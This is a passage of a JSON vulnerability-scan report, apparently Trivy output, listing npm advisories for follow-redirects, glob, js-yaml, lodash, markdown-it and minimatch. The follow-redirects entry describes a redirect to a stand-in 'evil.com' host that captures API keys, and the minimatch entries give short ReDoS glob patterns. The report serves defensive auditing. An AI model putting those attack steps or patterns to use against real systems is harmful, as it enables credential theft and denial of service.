"ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:56c430be3e8ce1c3fe82dfd8fab18307f64d7712ffa9624b2aa500d5504f5eed", "Title": "follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets", "Description": "## Summary\n\nWhen an HTTP request follows a cross-domain redirect (301/302/307/308), `follow-redirects` only strips `authorization`, `proxy-authorization`, and `cookie` headers (matched by regex at index.js:469-476). Any custom authentication header (e.g., `X-API-Key`, `X-Auth-Token`, `Api-Key`, `Token`) is forwarded verbatim to the redirect target.\n\nSince `follow-redirects` is the redirect-handling dependency for **axios** (105K+ stars), this vulnerability affects the entire axios ecosystem.\n\n## Affected Code\n\n`index.js`, lines 469-476:\n\n```javascript\nif (redirectUrl.protocol !== currentUrlParts.protocol \u0026\u0026\n redirectUrl.protocol !== \"https:\" ||\n redirectUrl.host !== currentHost \u0026\u0026\n !isSubdomain(redirectUrl.host, currentHost)) {\n removeMatchingHeaders(/^(?:(?:proxy-)?authorization|cookie)$/i, this._options.headers);\n}\n```\n\nThe regex only matches `authorization`, `proxy-authorization`, and `cookie`. Custom headers like `X-API-Key` are not matched.\n\n## Attack Scenario\n\n1. App uses axios with custom auth header: `headers: { 'X-API-Key': 'sk-live-secret123' }`\n2. Server returns `302 Location: https://evil.com/steal`\n3. follow-redirects sends `X-API-Key: sk-live-secret123` to `evil.com`\n4. Attacker captures the API key\n\n## Impact\n\nAny custom auth header set via axios leaks on cross-domain redirect. Extremely common pattern. Affects all axios users in Node.js.\n\n## Suggested Fix\n\nAdd a `sensitiveHeaders` option that users can extend, or strip ALL non-standard headers on cross-domain redirect.\n\n## Disclosure\n\nSource code review, manually verified. Found 2026-03-20.", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.9 } }, "References": [ "https://github.com/follow-redirects/follow-redirects", "https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9", "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653" ], "PublishedDate": "2026-04-14T01:11:11Z", "LastModifiedDate": "2026-04-14T01:11:11Z" }, { "VulnerabilityID": "CVE-2025-64756", "VendorIDs": [ "GHSA-5j98-mcp5-4vw2" ], "PkgID": "glob@10.4.5", "PkgName": "glob", "PkgIdentifier": { "PURL": "pkg:npm/glob@10.4.5", "UID": "aa8173cd075f0cb0" }, "InstalledVersion": "10.4.5", "FixedVersion": "11.1.0, 10.5.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64756", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:438e4ae35eba3f19a1424dbd14ce8631712291e65f153464a9f3e9af0774b568", "Title": "glob: glob: Command Injection Vulnerability via Malicious Filenames", "Description": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.", "Severity": "HIGH", "CweIDs": [ "CWE-78" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64756", "https://github.com/isaacs/node-glob", "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f", "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146", "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2", "https://nvd.nist.gov/vuln/detail/CVE-2025-64756", "https://www.cve.org/CVERecord?id=CVE-2025-64756" ], "PublishedDate": "2025-11-17T18:15:58.27Z", "LastModifiedDate": "2025-12-02T19:34:43.27Z" }, { "VulnerabilityID": "CVE-2025-64756", "VendorIDs": [ "GHSA-5j98-mcp5-4vw2" ], "PkgID": "glob@11.0.3", "PkgName": "glob", "PkgIdentifier": { "PURL": "pkg:npm/glob@11.0.3", "UID": "3a0538ce88725972" }, "InstalledVersion": "11.0.3", "FixedVersion": "11.1.0, 10.5.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64756", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6ec7ae4be5d73f56ab1ffffbd5ab4edf3fc8eae1909cb8c9ce137066ebef93be", "Title": "glob: glob: Command Injection Vulnerability via Malicious Filenames", "Description": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.", "Severity": "HIGH", "CweIDs": [ "CWE-78" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64756", "https://github.com/isaacs/node-glob", "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f", "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146", "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2", "https://nvd.nist.gov/vuln/detail/CVE-2025-64756", "https://www.cve.org/CVERecord?id=CVE-2025-64756" ], "PublishedDate": "2025-11-17T18:15:58.27Z", "LastModifiedDate": "2025-12-02T19:34:43.27Z" }, { "VulnerabilityID": "CVE-2025-64718", "VendorIDs": [ "GHSA-mh29-5h37-fv8m" ], "PkgID": "js-yaml@3.14.1", "PkgName": "js-yaml", "PkgIdentifier": { "PURL": "pkg:npm/js-yaml@3.14.1", "UID": "63902cab6028fa26" }, "InstalledVersion": "3.14.1", "FixedVersion": "4.1.1, 3.14.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64718", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6207568f406e0e06494d98d6905a43475f4796f0d8bf99beb6ccbf38e21c7610", "Title": "js-yaml: js-yaml prototype pollution in merge", "Description": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64718", "https://github.com/advisories/GHSA-mh29-5h37-fv8m", "https://github.com/nodeca/js-yaml", "https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879", "https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266", "https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876", "https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m", "https://nvd.nist.gov/vuln/detail/CVE-2025-64718", "https://www.cve.org/CVERecord?id=CVE-2025-64718" ], "PublishedDate": "2025-11-13T16:15:57.153Z", "LastModifiedDate": "2026-02-02T12:54:45.34Z" }, { "VulnerabilityID": "CVE-2025-64718", "VendorIDs": [ "GHSA-mh29-5h37-fv8m" ], "PkgID": "js-yaml@4.1.0", "PkgName": "js-yaml", "PkgIdentifier": { "PURL": "pkg:npm/js-yaml@4.1.0", "UID": "7704269816196759" }, "InstalledVersion": "4.1.0", "FixedVersion": "4.1.1, 3.14.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64718", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7b42f25f2dbbceb11a4e93796126012a47d80de146a4d427a845823aedd081b7", "Title": "js-yaml: js-yaml prototype pollution in merge", "Description": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64718", "https://github.com/advisories/GHSA-mh29-5h37-fv8m", "https://github.com/nodeca/js-yaml", "https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879", "https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266", "https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876", "https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m", "https://nvd.nist.gov/vuln/detail/CVE-2025-64718", "https://www.cve.org/CVERecord?id=CVE-2025-64718" ], "PublishedDate": "2025-11-13T16:15:57.153Z", "LastModifiedDate": "2026-02-02T12:54:45.34Z" }, { "VulnerabilityID": "CVE-2026-4800", "VendorIDs": [ "GHSA-r5fr-rjxr-66jc" ], "PkgID": "lodash@4.17.21", "PkgName": "lodash", "PkgIdentifier": { "PURL": "pkg:npm/lodash@4.17.21", "UID": "186d85640a76e982" }, "InstalledVersion": "4.17.21", "FixedVersion": "4.18.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4800", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:bfa4e6086061915add10b46668d382bb7bac351407b54c2f683980dddef29bdc", "Title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports", "Description": "Impact:\n\nThe fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.\n\nWhen an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().\n\nPatches:\n\nUsers should upgrade to version 4.18.0.\n\nWorkarounds:\n\nDo not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.", "Severity": "HIGH", "CweIDs": [ "CWE-94" ], "VendorSeverity": { "ghsa": 3, "nvd": 4, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "V3Score": 8.1 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "V3Score": 9.8 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "V3Score": 8.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-4800", "https://cna.openjsf.org/security-advisories.html", "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", "https://github.com/lodash/lodash", "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c", "https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc", "https://nvd.nist.gov/vuln/detail/CVE-2026-4800", "https://www.cve.org/CVERecord?id=CVE-2026-4800" ], "PublishedDate": "2026-03-31T20:16:29.66Z", "LastModifiedDate": "2026-04-07T15:43:13.197Z" }, { "VulnerabilityID": "CVE-2025-13465", "VendorIDs": [ "GHSA-xxjr-mmjv-4gpg" ], "PkgID": "lodash@4.17.21", "PkgName": "lodash", "PkgIdentifier": { "PURL": "pkg:npm/lodash@4.17.21", "UID": "186d85640a76e982" }, "InstalledVersion": "4.17.21", "FixedVersion": "4.17.23", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13465", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:cc25af6e4cbe197ebe6d0b3807bbd793f2a7d79c4805cf42fb22824d9912d1a3", "Title": "lodash: prototype pollution in _.unset and _.omit functions", "Description": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "alma": 3, "ghsa": 2, "nvd": 2, "oracle-oval": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H/E:P", "V3Score": 6.5, "V40Score": 6.9 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:2452", "https://access.redhat.com/security/cve/CVE-2025-13465", "https://bugzilla.redhat.com/2431740", "https://errata.almalinux.org/9/ALSA-2026-2452.html", "https://github.com/lodash/lodash", "https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81", "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", "https://linux.oracle.com/cve/CVE-2025-13465.html", "https://linux.oracle.com/errata/ELSA-2026-2452.html", "https://nvd.nist.gov/vuln/detail/CVE-2025-13465", "https://www.cve.org/CVERecord?id=CVE-2025-13465" ], "PublishedDate": "2026-01-21T20:16:05.25Z", "LastModifiedDate": "2026-02-17T17:10:07.52Z" }, { "VulnerabilityID": "CVE-2026-2950", "VendorIDs": [ "GHSA-f23m-r3pf-42rh" ], "PkgID": "lodash@4.17.21", "PkgName": "lodash", "PkgIdentifier": { "PURL": "pkg:npm/lodash@4.17.21", "UID": "186d85640a76e982" }, "InstalledVersion": "4.17.21", "FixedVersion": "4.18.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2950", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6c9904d5393f374ffc11303087653ff1ba1a4ab38beb6de263c68ff75ebcff4d", "Title": "lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass", "Description": "Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "ghsa": 2, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-2950", "https://github.com/lodash/lodash", "https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh", "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", "https://nvd.nist.gov/vuln/detail/CVE-2026-2950", "https://www.cve.org/CVERecord?id=CVE-2026-2950" ], "PublishedDate": "2026-03-31T20:16:26.207Z", "LastModifiedDate": "2026-04-07T16:12:25.97Z" }, { "VulnerabilityID": "CVE-2022-21670", "VendorIDs": [ "GHSA-6vfc-qv3f-vr6c" ], "PkgID": "markdown-it@10.0.0", "PkgName": "markdown-it", "PkgIdentifier": { "PURL": "pkg:npm/markdown-it@10.0.0", "UID": "4c261f3cdcfba96d" }, "InstalledVersion": "10.0.0", "FixedVersion": "12.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-21670", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:85671227dbd9d0e9036c7909ed5342e6f34c6212e2b58c6fe8aafe344a4de540", "Title": "markdown-it is a Markdown parser. Prior to version 1.3.2, special patt ...", "Description": "markdown-it is a Markdown parser. Prior to version 1.3.2, special patterns with length greater than 50 thousand characterss could slow down the parser significantly. Users should upgrade to version 12.3.2 to receive a patch. There are no known workarounds aside from upgrading.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400", "CWE-1333" ], "VendorSeverity": { "ghsa": 2, "nvd": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 }, "nvd": { "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V2Score": 5, "V3Score": 5.3 } }, "References": [ "https://github.com/markdown-it/markdown-it", "https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101", "https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c", "https://nvd.nist.gov/vuln/detail/CVE-2022-21670" ], "PublishedDate": "2022-01-10T21:15:07.967Z", "LastModifiedDate": "2024-11-21T06:45:11.87Z" }, { "VulnerabilityID": "CVE-2026-26996", "VendorIDs": [ "GHSA-3ppc-4f35-3m26" ], "PkgID": "minimatch@10.0.3", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@10.0.3", "UID": "85f0f94cea6a1bce" }, "InstalledVersion": "10.0.3", "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:44e70ce9a7fecb769ca3aaf8433029cf985038a09a5fb6545efbcea735a70298", "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "nvd": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-26996", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", "https://linux.oracle.com/cve/CVE-2026-26996.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", "https://www.cve.org/CVERecord?id=CVE-2026-26996" ], "PublishedDate": "2026-02-20T03:16:01.62Z", "LastModifiedDate": "2026-03-06T21:32:10.65Z" }, { "VulnerabilityID": "CVE-2026-27903", "VendorIDs": [ "GHSA-7r86-cg39-jmmj" ], "PkgID": "minimatch@10.0.3", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@10.0.3", "UID": "85f0f94cea6a1bce" }, "InstalledVersion": "10.0.3", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:97bc9e33a70f74e80bf237f22da7558149639f3813e910b88abe040b4bd49b9a", "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-407" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27903", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", "https://www.cve.org/CVERecord?id=CVE-2026-27903" ], "PublishedDate": "2026-02-26T02:16:21.353Z", "LastModifiedDate": "2026-02-27T17:21:22.37Z" }, { "VulnerabilityID": "CVE-2026-27904", "VendorIDs": [ "GHSA-23c5-xmqv-rm74" ], "PkgID": "minimatch@10.0.3", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@10.0.3", "UID": "85f0f94cea6a1bce" }, "InstalledVersion": "10.0.3", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6164b782fb639f600cef85bc67da3b470d16a8e405c5e07af70b9188d46a0419", "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-27904", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", 